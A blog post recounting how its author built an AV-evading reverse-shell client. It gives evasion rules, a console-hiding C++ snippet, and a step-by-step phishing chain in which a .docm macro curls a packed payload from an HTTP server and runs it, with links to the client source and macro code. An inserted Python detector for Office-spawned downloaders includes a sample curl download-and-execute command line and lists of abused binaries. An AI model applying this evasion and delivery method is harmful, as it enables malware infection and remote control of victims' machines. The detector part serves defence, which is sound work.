Do not trust your Anti Malware

Arda Büyükkaya
Dec 2, 2020

I want to share my malware development story, from zero to a weaponized sample.

Everything started with a question I asked myself: how hard is it to write malware? It depends on what you want. I just wanted a reverse shell from the victim, and of course it had to be persistent and evade Windows Defender or any other anti-malware software.

So I did research for two or three weeks and read some open-source malware from the internet. Friendly reminder: using those malware source codes as a payload or red-teaming tool is a big mistake (public samples are already well known to every AV vendor), but I learned a lot of good stuff from them.

On this journey I made some rules for developing my perfect undetectable malware *chuckles*

Don’ts

1-) Do not copy other malware authors' source code.

2-) Do not use crypters from underground Russian hackers.

3-) Do not use publicly shared tools such as Invoke-Obfuscation v1.8, Unicorn, Empire, etc. (every vendor already has signatures for them).

Do’s

1-) Use C++; it is great for low-level stuff and makes the Windows API easy to use.

2-) Encrypt your communication and all strings (cleartext IPs, URLs and command strings are exactly what static scanners and analysts grep for).

3-) You need persistence and evasion, so think clever.

4-) Weaponize your malware, for example with a .docm file carrying a malicious VBA macro, delivered by phishing email.

5-) Use a custom packer (the hard way) or a public executable packer such as UPX for evasion and to slow down malware analysis. Keep in mind that UPX is unpacked trivially with upx -d and an unmodified UPX header is itself a common heuristic flag, so a custom or modified packer holds up better.

On my first try I simply turned on Defender and tested my malware client on a Windows 10 VM. Obviously I was not successful the first time: my .exe file was blocked by Windows Defender. So I updated my source code. In the previous version I had used the FreeConsole function, and that function triggered the anti-malware software.

Function to hide your client's console window (the replacement for the FreeConsole call):

#include <windows.h>

// Hide the console window of the current process instead of detaching it with FreeConsole().
void HideConsole() {
    ::ShowWindow(::GetConsoleWindow(), SW_HIDE);
}

I updated the malware source code, and after test after test I got the reverse shell and evaded Defender. That was fun, but I think the hard part is weaponizing your malware. I can get a connection from the victim using netcat or the Metasploit multi/handler, but how do I weaponize this malware?

I found a site called any.run. It helps with malware analysis and gives you information about malware, like the spreading, evasion and other techniques used by real samples. There I found a very interesting and easy method for weaponizing and spreading the malware: a macro-enabled .docm file with VBA. Well, I have used VBA macros since I was 13 years old lol, so step by step:

1-) Obfuscate and pack your malware client.

2-) Use an HTTP dropper: host the packed client with a Python HTTP server (python -m http.server).

3-) Create a macro-enabled .docm file whose macro downloads the malware with curl and executes it on the victim machine.

4-) Update your Windows test machine and Defender, so you are testing against current signatures.

5-) Listen for the TCP connection with Metasploit (multi/handler).

6-) Send the .docm file to the victim; the victim enables macros and some magic happens.

7-) Get the TCP reverse shell and realize no system is safe, especially Windows :/
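The chain in steps 1-7 evades signature scanning, but it leaves a very recognisable process tree on the victim: Word spawning a command-line downloader, then an executable running out of the user's temp directory. As an added example that is not part of the original post, here is defender-side detection logic that walks that tree over constructed Sysmon-style process-creation records. The record format, the sample events, the 10.0.0.5 dropper address and the process names in the lists are my own assumptions for the example.

```python
import ntpath
from dataclasses import dataclass
from typing import Dict, List, Tuple

# Office hosts that should not normally launch command-line tooling.
OFFICE_PARENTS = {"winword.exe", "excel.exe", "powerpnt.exe", "outlook.exe"}

# Download-and-execute helpers a macro typically reaches for (curl is the one
# used in step 3 above; the others are common substitutes). Assumed list.
SUSPICIOUS_CHILDREN = {
    "curl.exe", "certutil.exe", "bitsadmin.exe", "powershell.exe", "cmd.exe",
    "mshta.exe", "wscript.exe", "cscript.exe", "rundll32.exe", "regsvr32.exe",
}

# Path fragments that mark user-writable drop locations for the downloaded payload.
USER_WRITABLE = ("\\appdata\\", "\\temp\\", "\\downloads\\", "\\public\\", "\\programdata\\")


@dataclass
class ProcEvent:
    pid: int
    ppid: int
    image: str      # full image path, as Sysmon Event ID 1 logs it
    cmdline: str


def parse_events(lines: List[str]) -> List[ProcEvent]:
    """Parse constructed 'pid,ppid,image,cmdline' records (cmdline may contain commas)."""
    events = []
    for line in lines:
        line = line.strip()
        if not line or line.startswith("#"):
            continue
        pid, ppid, image, cmdline = line.split(",", 3)
        events.append(ProcEvent(int(pid), int(ppid), image, cmdline))
    return events


def image_name(path: str) -> str:
    """Lower-cased file name of a Windows image path."""
    return ntpath.basename(path).lower()


def find_office_chains(events: List[ProcEvent]) -> List[Tuple[int, int, str]]:
    """Walk every descendant of an Office process and flag the download-and-execute pattern.

    Returns (office_pid, offending_pid, reason) tuples. Lineage, not file content, is
    what gets matched, so packing or obfuscating the client (step 1) does not change it.
    """
    children: Dict[int, List[ProcEvent]] = {}
    for ev in events:
        children.setdefault(ev.ppid, []).append(ev)

    findings: List[Tuple[int, int, str]] = []
    for office in (ev for ev in events if image_name(ev.image) in OFFICE_PARENTS):
        stack = list(children.get(office.pid, []))
        while stack:
            proc = stack.pop()
            name = image_name(proc.image)
            if name in SUSPICIOUS_CHILDREN:
                findings.append((office.pid, proc.pid,
                                 f"{image_name(office.image)} spawned {name}"))
            elif any(marker in proc.image.lower() for marker in USER_WRITABLE):
                findings.append((office.pid, proc.pid,
                                 f"{image_name(office.image)} ran a binary from a user-writable path: {proc.image}"))
            # Keep walking: the dropped payload is often a grandchild (Word -> cmd -> payload).
            stack.extend(children.get(proc.pid, []))
    return findings


# Constructed telemetry for one victim: explorer launches Word on the phishing
# document, the macro runs "cmd /c curl ... && start ...", and Word's usual
# benign helper (splwow64) plus an unrelated notepad are there as negatives.
SAMPLE_EVENTS = r"""
# pid,ppid,image,cmdline   (constructed, Sysmon Event ID 1 style)
1000,800,C:\Windows\explorer.exe,explorer.exe
2000,1000,C:\Program Files\Microsoft Office\root\Office16\WINWORD.EXE,"WINWORD.EXE" /n "C:\Users\bob\Downloads\invoice.docm"
2200,2000,C:\Windows\splwow64.exe,splwow64.exe 12288
2300,2000,C:\Windows\System32\cmd.exe,cmd /c curl -s http://10.0.0.5:8000/update.exe -o %TEMP%\update.exe && start %TEMP%\update.exe
2310,2300,C:\Windows\System32\curl.exe,curl -s http://10.0.0.5:8000/update.exe -o C:\Users\bob\AppData\Local\Temp\update.exe
2320,2300,C:\Users\bob\AppData\Local\Temp\update.exe,update.exe
2400,1000,C:\Windows\System32\notepad.exe,notepad.exe
"""


def run_sample() -> List[Tuple[int, int, str]]:
    """Run the check over the constructed sample; flags cmd.exe, curl.exe and the dropped payload."""
    return find_office_chains(parse_events(SAMPLE_EVENTS.splitlines()))


if __name__ == "__main__":
    for office_pid, pid, reason in run_sample():
        print(f"ALERT office_pid={office_pid} pid={pid}: {reason}")
```

On a real estate the same logic runs over Sysmon Event ID 1 or EDR process-creation telemetry instead of the constructed list. The practical caveat for step 3: on hosts where Defender's attack surface reduction rule "Block all Office applications from creating child processes" is enabled, the macro's Shell call is blocked before curl ever runs, so the evasion work in steps 1 and 2 never gets a chance to matter.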

Tweet series

PoC

Malware client source code

https://github.com/whichbuffer/ReverseShell

Note: I don't share this for harmful hacking. This version of my code is just a demo and does not contain the fully functional malware source code that I used for red-teaming operations; I just want to show how poorly these antivirus systems perform in this attack scenario.

VBA macro code for docm file

https://raw.githubusercontent.com/whichbuffer/ReverseShell/main/macro_code

Huge thanks to:

https://github.com/vxunderground

https://github.com/ytisf/theZoo

https://twitter.com/dinosn

My PGP public keys:

https://github.com/whichbuffer/pgp

Sincerely Whichbuffer (Arda)

https://twitter.com/whichbuffer/


Arda Büyükkaya

Programmer, Malware Analyst and Vulnerability Researcher